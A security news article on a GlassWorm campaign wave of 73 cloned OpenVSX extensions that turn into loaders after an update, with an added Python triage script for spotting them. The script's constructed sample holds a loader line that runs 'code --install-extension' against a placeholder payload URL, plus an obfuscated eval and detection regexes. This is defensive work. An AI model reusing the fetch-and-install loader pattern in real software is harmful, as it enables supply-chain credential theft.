
A new wave of the GlassWorm campaign is targeting the OpenVSX ecosystem with 73 "sleeper" extensions that turn malicious after an update.
Six of the extensions have been activated and deliver malware, while researchers assess with high confidence that the rest are dormant or at least suspicious.
When first uploaded, the extensions are benign; the payload is delivered at a later stage, revealing the attacker's true intent.
"This count may change as new updates continue to appear, but the pattern is consistent with previous GlassWorm waves," say researchers at software security company Socket.
GlassWorm is an ongoing supply chain attack campaign first observed in October, initially using invisible Unicode characters to hide malicious code that steals cryptocurrency wallets and developer credentials.
It has since expanded across multiple ecosystems, including GitHub repositories, npm packages, and both the Visual Studio Code Marketplace and OpenVSX. The operators have also been seen targeting macOS users with trojanized crypto wallet clients.
A recent wave in mid-March 2026 showed significant scale, affecting hundreds of repositories and dozens of extensions.
However, operations of that scale are noisy and leave multiple traces, and several distinct research teams caught the activity early and helped block it.
The latest wave suggests the attacker is changing tactics: submitting harmless extensions to a single ecosystem and introducing the malicious payload in a subsequent update, rather than embedding it in the extensions from the start.
Socket found that the 73 extensions involved in the latest GlassWorm campaign are clones of legitimate listings, designed to trick developers who don't look much beyond the visuals.
In one case, the attacker used the same icon as the legitimate extension and adopted a similar name and description. Although there are subtle differences, the reliable indicators are the publisher name and the unique extension identifier, which a clone cannot copy.
Instead of carrying the malware, the extensions now act as thin loaders that fetch it via one of the following methods:
- The extension retrieves a secondary VSIX package from GitHub at runtime and installs it using CLI commands.
- The extension loads platform-specific compiled modules (.node files) that contain the core logic, including fetching additional payloads and running install routines across supported editors.
- Some variants rely entirely on heavily obfuscated JavaScript that decodes at runtime to fetch and install malicious extensions, sometimes including encrypted or fallback URLs for payload retrieval.
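The script below is an added example, not Socket's tooling and not code from the article. It triages an unpacked extension for the loader traits listed above (invisible Unicode in source, a runtime VSIX fetch followed by a CLI install, native .node modules, heavily escaped JavaScript) and for the publisher/identifier mismatch described in the clone discussion. The Unicode ranges, the escape-ratio threshold, the sample manifest, the publisher names and the URL are all assumptions constructed for the example.

```python
"""Heuristic triage of an unpacked VS Code / OpenVSX extension for loader traits.

Signals are taken from the article: invisible Unicode in source, runtime VSIX
fetch plus CLI install, native .node modules carrying the logic, heavily escaped
JavaScript, and a publisher/identifier that differs from the listing you meant to
install. Ranges and thresholds below are assumptions, not Socket's detections.
"""
from __future__ import annotations

import json
import os
import re
import sys

# Zero-width, bidirectional-control and variation-selector code points that render
# as nothing. Assumption: the article only says "invisible Unicode characters";
# these are the ranges most commonly abused for that purpose.
INVISIBLE_RE = re.compile(
    r"[\u200b-\u200f\u2060-\u2064\u180e\ufeff\ufe00-\ufe0f\U000e0100-\U000e01ef]"
)
CLI_INSTALL_RE = re.compile(r"--install-extension\b")
CHILD_PROC_RE = re.compile(r"\b(?:child_process|execSync|spawnSync|execFile|exec|spawn)\b")
VSIX_URL_RE = re.compile(r"https?://[^\s'\"`]+\.vsix\b", re.IGNORECASE)
HEX_ESCAPE_RE = re.compile(r"\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}")
HEX_ESCAPE_RATIO = 0.05  # assumption: >5% of a file inside escapes is an obfuscation hint


def scan_source(path: str, text: str) -> list[str]:
    """Findings for one JavaScript/TypeScript file; an empty list means nothing flagged."""
    findings = []
    hidden = INVISIBLE_RE.findall(text)
    if hidden:
        findings.append(f"{path}: {len(hidden)} invisible Unicode code point(s)")
    if CLI_INSTALL_RE.search(text) and CHILD_PROC_RE.search(text):
        findings.append(f"{path}: spawns a CLI --install-extension at runtime")
    for url in VSIX_URL_RE.findall(text):
        findings.append(f"{path}: fetches VSIX from {url}")
    escaped = sum(len(m) for m in HEX_ESCAPE_RE.findall(text))
    if text and escaped / len(text) > HEX_ESCAPE_RATIO:
        findings.append(f"{path}: {escaped / len(text):.0%} of file is hex/unicode escapes")
    return findings


def scan_extension(files: dict[str, bytes], expected_id: str | None = None) -> list[str]:
    """Triage an extension given as {relative_path: contents}.

    expected_id is the publisher.name pair you intended to install. Icon and
    display name are deliberately not compared, because the clones copy them.
    """
    findings = []
    for path, data in files.items():
        if path.endswith(".node"):
            findings.append(f"{path}: native module carries compiled logic")
        elif path.endswith((".js", ".cjs", ".mjs", ".ts")):
            findings.extend(scan_source(path, data.decode("utf-8", errors="replace")))
    manifest = files.get("package.json")
    if manifest is not None and expected_id:
        meta = json.loads(manifest)
        actual = f"{meta.get('publisher')}.{meta.get('name')}"
        if actual != expected_id:
            findings.append(f"package.json: identifier {actual} differs from expected {expected_id}")
    return findings


def load_extension_dir(root: str) -> dict[str, bytes]:
    """Read an installed extension directory (e.g. ~/.vscode/extensions/<id>) into memory."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                files[os.path.relpath(full, root)] = fh.read()
    return files


# Constructed sample: a look-alike listing that ships a thin loader. Publisher
# names, identifiers and the URL are placeholders, not real extensions.
SAMPLE_EXTENSION = {
    "package.json": json.dumps({
        "publisher": "lookalike-pub", "name": "sample-formatter",
        "displayName": "Sample Formatter", "icon": "icon.png",
    }).encode(),
    "out/extension.js": (
        "const { execSync } = require('child_process');\n"
        "const marker = 'a\ufe00\ufe01\ufe02b';  // three variation selectors hidden here\n"
        "const u = 'https://example.invalid/r/payload.vsix';\n"
        "execSync(`code --install-extension ${u}`);\n"
    ).encode(),
    # The escaped string decodes to "fetch"; the rest of the file is the escapes.
    "out/stage2.js": b'eval("\\x66\\x65\\x74\\x63\\x68")\n',
    "build/loader.node": b"\x7fELF placeholder",
}


def triage_sample(expected_id: str = "trusted-pub.sample-formatter") -> list[str]:
    """Run the triage over the constructed sample against the id you meant to install."""
    return scan_extension(SAMPLE_EXTENSION, expected_id)


if __name__ == "__main__":
    if len(sys.argv) > 1:  # usage: triage.py <extension dir> [publisher.name]
        for line in scan_extension(load_extension_dir(sys.argv[1]), *sys.argv[2:3]):
            print(line)
    else:
        print("\n".join(triage_sample()))
```

Run it against a directory under your editor's extensions folder with the publisher.name you expected to install as the second argument. The identifier comparison is the check that survives a convincing clone; the other four signals are heuristics and will also fire on some legitimate extensions (native modules and minified bundles are common), so treat hits as triage input, not a verdict.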
Socket did not provide technical details about the latest payload. Previously, these attacks aimed at stealing cryptocurrency wallet data, credentials, access tokens, SSH keys, and developer environment data.
The cybersecurity company has published the full list of the 73 extensions believed to be part of the latest GlassWorm wave. Developers who installed any of them are advised to rotate all secrets and clean their environment.




